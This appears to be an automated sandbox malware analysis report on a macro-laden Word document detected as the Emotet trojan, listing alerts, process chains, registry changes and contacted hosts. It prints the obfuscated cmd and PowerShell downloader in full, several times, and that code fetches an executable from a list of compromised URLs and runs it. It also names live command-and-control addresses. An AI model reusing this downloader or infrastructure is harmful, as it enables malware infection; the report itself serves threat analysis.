02vPLpWc
This report is generated from a file or URL submitted to this webservice on May 17th 2018 09:52:19 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by
Falcon Sandbox v8.10 © Hybrid Analysis
Incident Response
Risk Assessment
- Remote Access
- Uses network protocols on unusual ports
- Persistence
- Spawns a lot of processes
- Network Behavior
- Contacts 1 domain and 3 hosts. View all details
Additional Context
Related Sandbox Artifacts
- Associated URLs
- hxxp://avirtualassistant.net/02vPLpWc/
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 12
-
External Systems
-
Detected Suricata Alert
- details
-
Detected alert "ETPRO TROJAN W32/Emotet CnC Checkin" (SID: 2830701, Rev: 2, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ET POLICY PE EXE or DLL Windows file download HTTP" (SID: 2018959, Rev: 3, Severity: 1) categorized as "Potential Corporate Privacy Violation" - source
- Suricata Alerts
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by a significant amount of reputation engines
- details
- 3/67 reputation engines marked "http://ifcingenieria.cl" as malicious (4% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 7/57 Antivirus vendors marked sample as malicious (12% detection rate)
- source
- External System
- relevance
- 8/10
-
Detected Suricata Alert
-
General
-
Document spawns new processes
- details
- Document spawned a new process (macro present)
- source
- Indicator Combinations
- relevance
- 7/10
-
GETs files from a webserver
- details
-
"GET /76j4qo/ HTTP/1.1Host: ifcingenieria.clConnection: Keep-Alive"
"GET / HTTP/1.1Cookie: 22986=YfPsLfSbd4Y/yDt9dkvBSyvzDiRk06hQ5kQKootMxRN16gKf7UDw5xeHQLGa+63Wa0LEVngjmjKQ6hEk5Dzv7Z6dLgr1u/GUPvPdvLwQwpGMoAqqBHs1nd2IkkR1JLMCqAsQ9a/GfLtFsCWc5Ht5U5YctPH0LQcsHMl8hpOvk3qoq5Z3KA42kojnnkoWCvXUDeTyBS/rUgviG4oaBZKYIO7Mrw4KazYAWAVZtMGA7qrGrnyrb/DMu81dPHWovrDOa2smKTNrTdvKCagZSdJhgFgqJy1JZwHDpBSiuiKgmzgULEjmMZAZ7l8UR91gAP9iPPkT+vCJ8sEKv4r6Rs4AmisCKCx8Xb1TT1c6T+yoa+rTHauO808jGdH+om/jDqXJYzas5zuOKxkZ3YIL3GpCjMqhZEVkext9KubxIwe6Ww8zbnjIUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 81.21.67.85:8080Connection: Keep-AliveCache-Control: no-cache" - source
- Network Traffic
- relevance
- 10/10
-
Document spawns new processes
-
Installation/Persistance
-
Writes data to a remote process
- details
-
"cmd.exe" wrote 32 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 84)
"cmd.exe" wrote 52 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 84)
"cmd.exe" wrote 4 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 84)
"powershell.exe" wrote 32 bytes to a remote process "%PUBLIC%\166520.exe" (Handle: 1548)
"powershell.exe" wrote 52 bytes to a remote process "%PUBLIC%\166520.exe" (Handle: 1548)
"powershell.exe" wrote 4 bytes to a remote process "%PUBLIC%\166520.exe" (Handle: 1548)
"166520.exe" wrote 32 bytes to a remote process "%WINDIR%\System32\cosineinit.exe" (Handle: 436)
"166520.exe" wrote 52 bytes to a remote process "%WINDIR%\System32\cosineinit.exe" (Handle: 436)
"166520.exe" wrote 4 bytes to a remote process "%WINDIR%\System32\cosineinit.exe" (Handle: 436) - source
- API Call
- relevance
- 6/10
-
Writes data to a remote process
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "138.0.120.12": ...
URL: http://vertek.cl/ (AV positives: 1/67 scanned on 04/27/2018 15:47:08)
URL: http://ifcingenieria.cl/ (AV positives: 3/67 scanned on 04/26/2018 10:45:03)
URL: http://ifcingenieria.cl/ni9tsuvgzii (AV positives: 3/67 scanned on 04/25/2018 18:44:00)
URL: http://ifcingenieria.cl/ni9TSuVGZII/ (AV positives: 2/67 scanned on 04/25/2018 17:24:27)
URL: http://kundaliniyogasimran.cl/WysiwygPro/editor_files/_images/cds-food-azar/cooking-a-smoked-pork-shoulder-picnic.html (AV positives: 1/67 scanned on 03/22/2018 07:35:55)
File SHA256: 3801181d5eec749898527ebc4279741acbc9f82c8aa72f8be272031d67eea76b (AV positives: 10/59 scanned on 04/25/2018 13:51:22)
File SHA256: 3f73123b71be81eb666247aaee7f7fb33ffc0160f29c586623067044b6521bb0 (AV positives: 10/70 scanned on 04/25/2018 11:56:13)
File SHA256: 77795c8a3c5a8ff8129cb4db828828c53a590f93583fcfb0b1112a4e670c97d4 (AV positives: 1/56 scanned on 05/19/2017 09:54:38)
File SHA256: a2cad944f3399bde2a5691c14be8b4f939898b5a97dadd579aff3390cdf3624f (AV positives: 1/56 scanned on 07/19/2016 09:29:10) - source
- Network Traffic
- relevance
- 10/10
-
Uses network protocols on unusual ports
- details
- TCP traffic to 81.21.67.85 on port 8080
- source
- Network Traffic
- relevance
- 7/10
-
Malicious artifacts seen in the context of a contacted host
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
-
Spawns a lot of processes
- details
-
Spawned process "WINWORD.EXE" with commandline "/n "C:\02vPLpWc.doc"" (Show Process)
Spawned process "cmd.exe" with commandline "Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))" (Show Process), Spawned process "powershell.exe" with commandline "powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))" (Show Process), Spawned process "166520.exe" (Show Process), Spawned process "cosineinit.exe" (Show Process) - source
- Monitored Target
- relevance
- 8/10
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Hiding 2 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 13
-
External Systems
-
Detected Suricata Alert
- details
- Detected alert "ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download" (SID: 2016538, Rev: 3, Severity: 2) categorized as "Potentially Bad Traffic"
- source
- Suricata Alerts
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
- 3/67 reputation engines marked "http://ifcingenieria.cl" as malicious (4% detection rate)
- source
- External System
- relevance
- 10/10
-
Detected Suricata Alert
-
General
-
Found a potential E-Mail address in binary/memory
- details
-
Pattern match: "lrqjor@acfarihso2squ.eozmftwzaojzglmgx275315aeb"
Pattern match: "570kmqatvuhjlu@qculdb.8z59uesf7p82066"
Pattern match: "sczcin3c7bopwqupp@51rtqrehb58ot.rddqrbi"
Pattern match: "pe9eldtfifdaex@lnwbyu9odpe9.uyy"
Pattern match: "tn@eilcbetw.ten.mu" - source
- File/Memory
- relevance
- 3/10
-
Found a potential E-Mail address in binary/memory
-
Installation/Persistance
-
Creates new processes
- details
-
"WINWORD.EXE" is creating a new process (Name: "%WINDIR%\System32\cmd.exe", Handle: 1308)
"cmd.exe" is creating a new process (Name: "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe", Handle: 84)
"powershell.exe" is creating a new process (Name: "%PUBLIC%\166520.exe", Handle: 1548)
"166520.exe" is creating a new process (Name: "%WINDIR%\System32\cosineinit.exe", Handle: 436) - source
- API Call
- relevance
- 8/10
-
Drops executable files
- details
- "166520.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Opens the MountPointManager (often used to detect additional infection locations)
- details
-
"WINWORD.EXE" opened "\Device\MountPointManager"
"powershell.exe" opened "\Device\MountPointManager"
"166520.exe" opened "\Device\MountPointManager" - source
- API Call
- relevance
- 5/10
-
Creates new processes
-
Network Related
-
Found potential IP address in binary/memory
- details
- "81.21.67.85"
- source
- File/Memory
- relevance
- 3/10
-
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
- source
- Network Traffic
- relevance
- 10/10
-
Found potential IP address in binary/memory
-
System Security
-
Modifies proxy settings
- details
-
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"cosineinit.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
"cosineinit.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
"cosineinit.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE") - source
- Registry Access
- relevance
- 10/10
-
Modifies proxy settings
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
-
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
Found suspicious keyword "StrReverse" which indicates: "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)" - source
- Static Parser
- relevance
- 10/10
-
Executes powershell accessing native variables
- details
-
Process "powershell.exe" with commandline "powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))" (Indicator: "$pshome"
UID: 00045885-00003800) - source
- Monitored Target
- relevance
- 10/10
-
Extensive usage of escape characters in the commandline
- details
-
Process "cmd.exe" with commandline "Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
